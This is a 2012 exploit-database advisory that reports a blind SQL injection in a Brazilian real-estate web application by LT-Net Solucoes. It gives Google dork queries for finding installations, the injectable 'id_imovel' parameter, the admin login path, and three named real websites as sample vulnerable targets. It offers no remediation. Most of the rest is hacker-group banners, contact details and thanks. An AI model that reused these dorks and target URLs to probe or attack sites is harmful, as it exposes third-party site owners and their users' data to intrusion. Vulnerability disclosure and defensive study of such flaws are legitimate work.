LT-Net Solucoes - Blind SQL Injection Vulnerability



EKU-ID: 1760 CVE: OSVDB-ID:
Author: TheCyberNuxbie Published: 2012-03-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

==========================================================================
<<<:>>>     LT-Net Solucoes - Blind SQL Injection Vulnerability    <<<:>>>
==========================================================================
                                                          
 - Discovered By:
 ||| TheCyberNuxbie - Independent Security Research |||
 <<< staff@thecybernuxbie.com >>> YM: nux_exploit
 [ www.thecybernuxbie.com ] $ CP: +62856-2538-963

 - Info WebApps:
 This Content Develop By LT-Net:
 http://www.ltnetsolucoes.com.br/
 
 - Google Dork:
 inurl:"/detalha_imovel.php?id_imovel="
 intext:"Desenvolvido por: LT-Net Soluções"

 - Exploit Concept:
 http://lokalisasi/WebApps/detalha_imovel.php?id_imovel=[Blind SQLi]
 
 - Private Area:
 http://lokalisasi/WebApps/admin/ <--- LogIn Area...!!!
 
 - Sample WebApps Vuln SQLi:
 http://regionalclubedeferias.com.br/site/detalha_imovel.php?id_imovel=11' + [Blind SQLi]
 http://aramizoimoveis.com.br/site/detalha_imovel.php?id_imovel=21' + [Blind SQLi]
 http://caldasnovasimoveis.com.br/site/detalha_imovel.php?id_imovel=13' + [Blind SQLi]
 
 -:>>> Special Thanks <<<:-
 *** 1337day Inj3ct0r TEAM ***
 ...:::' All Member & Staff Inj3ct0r TEAM ':::...
 [ r007er, Sid3^effects, r4dc0re, CroSs, KedAns-Dz, indoushka ]
 [ SeeMe, KnocKout, ZoRLu, anT!-Tr0J4n, Kalashinkov3, Angel Injection ]
 [ cr4wl3r, team_elite, erytronic, r4h0x, cyberbag0r, Denc0plax, AlexMx ]
 [ cyberlog, donyskynet, elmonny, Hmei7, Ketek, fazzta, eidelweiss ]
 [ kaMtiEz, g3mbeL_YCL, YazidNoeha, AfniGates, Puzy_4ngeLz, Reynaey ,etc ]
 #########################################################################
  
 [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ]
 
 Me @ Solo Raya, 23 March 2012 @ 09:34 PM. AntiSecureCrew IT-Terminator
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$